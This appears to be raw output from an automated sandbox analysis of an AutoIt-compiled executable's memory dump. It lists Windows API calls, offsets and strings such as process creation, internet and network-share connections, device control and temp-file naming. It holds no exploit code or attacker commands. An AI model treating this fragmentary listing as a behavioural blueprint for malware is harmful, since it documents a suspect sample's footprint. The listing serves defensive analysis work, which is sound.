                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CD1970
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CD715C
                          • _memset.LIBCMT ref: 00CD717D
                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CD71CF
                          • CloseHandle.KERNEL32(00000000), ref: 00CD71D8
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle_memset
                          • String ID:
                          • API String ID: 1157408455-0
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CD13EE
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00CD1409
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00CD141F
                          • FreeLibrary.KERNEL32(?), ref: 00CD1474
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                          • String ID:
                          • API String ID: 3137044355-0
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCC285
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCC297
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCC2AD
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCC2C8
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAC657
                          • GetStockObject.GDI32(00000011), ref: 00CAC66B
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAC675
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CD354D,?,00CD45D5,?,00008000), ref: 00CD49EE
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CD354D,?,00CD45D5,?,00008000), ref: 00CD4A13
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CD354D,?,00CD45D5,?,00008000), ref: 00CD4A1D
                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00CD354D,?,00CD45D5,?,00008000), ref: 00CD4A50
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          APIs
                            • Part of subcall function 00CB869D: __getptd_noexit.LIBCMT ref: 00CB869E
                          • __lock.LIBCMT ref: 00CB811F
                          • InterlockedDecrement.KERNEL32(?), ref: 00CB813C
                          • _free.LIBCMT ref: 00CB814F
                          • InterlockedIncrement.KERNEL32(01363B40), ref: 00CB8167
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 2704283638-0
                          APIs
                          • __lock.LIBCMT ref: 00CB8768
                            • Part of subcall function 00CB8984: __mtinitlocknum.LIBCMT ref: 00CB8996
                            • Part of subcall function 00CB8984: RtlEnterCriticalSection.NTDLL(00CB0127), ref: 00CB89AF
                          • InterlockedIncrement.KERNEL32(DC840F00), ref: 00CB8775
                          • __lock.LIBCMT ref: 00CB8789
                          • ___addlocaleref.LIBCMT ref: 00CB87A7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                          • String ID:
                          • API String ID: 1687444384-0
                          APIs
                          • _memset.LIBCMT ref: 00CFE14D
                          • _memset.LIBCMT ref: 00CFE15C
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D53EE0,00D53F24), ref: 00CFE18B
                          • CloseHandle.KERNEL32 ref: 00CFE19D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: _memset$CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3277943733-0
                          APIs
                            • Part of subcall function 00CAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAB5EB
                            • Part of subcall function 00CAB58B: SelectObject.GDI32(?,00000000), ref: 00CAB5FA
                            • Part of subcall function 00CAB58B: BeginPath.GDI32(?), ref: 00CAB611
                            • Part of subcall function 00CAB58B: SelectObject.GDI32(?,00000000), ref: 00CAB63B
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFE860
                          • LineTo.GDI32(00000000,?,?), ref: 00CFE86D
                          • EndPath.GDI32(00000000), ref: 00CFE87D
                          • StrokePath.GDI32(00000000), ref: 00CFE88B
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCD640
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCD653
                          • GetCurrentThreadId.KERNEL32 ref: 00CCD65A
                          • AttachThreadInput.USER32(00000000), ref: 00CCD661
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          APIs
                          • GetSysColor.USER32(00000008), ref: 00CAB0C5
                          • SetTextColor.GDI32(?,000000FF), ref: 00CAB0CF
                          • SetBkMode.GDI32(?,00000001), ref: 00CAB0E4
                          • GetStockObject.GDI32(00000005), ref: 00CAB0EC
                          • GetWindowDC.USER32(?,00000000), ref: 00D0ECFA
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D0ED07
                          • GetPixel.GDI32(00000000,?,00000000), ref: 00D0ED20
                          • GetPixel.GDI32(00000000,00000000,?), ref: 00D0ED39
                          • GetPixel.GDI32(00000000,?,?), ref: 00D0ED59
                          • ReleaseDC.USER32(?,00000000), ref: 00D0ED64
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Similarity
                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                          • String ID:
                          APIs
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          APIs
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          APIs
                          Strings
                          Similarity
                          • API ID: _memmove
                          • String ID: >$DEFINE
                          APIs
                          • OleSetContainedObject.OLE32(?,00000001), ref: 00CCECA0
                          Strings
                          Similarity
                          • API ID: ContainedObject
                          • String ID: AutoIt3GUI$Container
                          APIs
                            • Part of subcall function 00C93BCF: _wcscpy.LIBCMT ref: 00C93BF2
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • __wcsnicmp.LIBCMT ref: 00CDE785
                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CDE84E
                          Strings
                          Similarity
                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                          • String ID: LPT
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00C91B83
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00C91B9C
                          Strings
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          APIs
                            • Part of subcall function 00C9417D: __fread_nolock.LIBCMT ref: 00C9419B
                          • _wcscmp.LIBCMT ref: 00CDCF49
                          • _wcscmp.LIBCMT ref: 00CDCF5C
                          Strings
                          Similarity
                          • API ID: _wcscmp$__fread_nolock
                          • String ID: FILE
                          APIs
                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00CFA668
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CFA67D
                          Strings
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          APIs
                          • _memset.LIBCMT ref: 00CE57E7
                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00CE581D
                          Strings
                          Similarity
                          • API ID: CrackInternet_memset
                          • String ID: |
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00CF961B
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CF9657
                          Strings
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          APIs
                          • _memset.LIBCMT ref: 00CD5BE4
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CD5C1F
                          Strings
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          APIs
                          • __snwprintf.LIBCMT ref: 00CE6BDD
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          Strings
                          Similarity
                          • API ID: __snwprintf_memmove
                          • String ID: , $$AUTOITCALLVARIABLE%d
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CF9269
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF9274
                          Strings
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          APIs
                            • Part of subcall function 00CAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAC657
                            • Part of subcall function 00CAC619: GetStockObject.GDI32(00000011), ref: 00CAC66B
                            • Part of subcall function 00CAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAC675
                          • GetWindowRect.USER32(00000000,?), ref: 00CF9775
                          • GetSysColor.USER32(00000012), ref: 00CF978F
                          Strings
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00CF94A6
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CF94B5
                          Strings
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          APIs
                          • _memset.LIBCMT ref: 00CD5CF3
                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CD5D12
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CE544C
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CE5475
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: htonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 3832099526-2422070025
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CCC5E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: __fread_nolock_memmove
                          • String ID: EA06
                          • API String ID: 1988441806-3962188686
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CCC4E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CCC562
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: ClassName_wcscmp
                          • String ID: #32770
                          • API String ID: 2292705959-463685578
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CCB36B
                            • Part of subcall function 00CB2011: _doexit.LIBCMT ref: 00CB201B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF84DF
                          • PostMessageW.USER32(00000000), ref: 00CF84E6
                            • Part of subcall function 00CD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD83CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF849F
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CF84B2
                            • Part of subcall function 00CD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD83CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00CDD01E
                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00CDD035
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371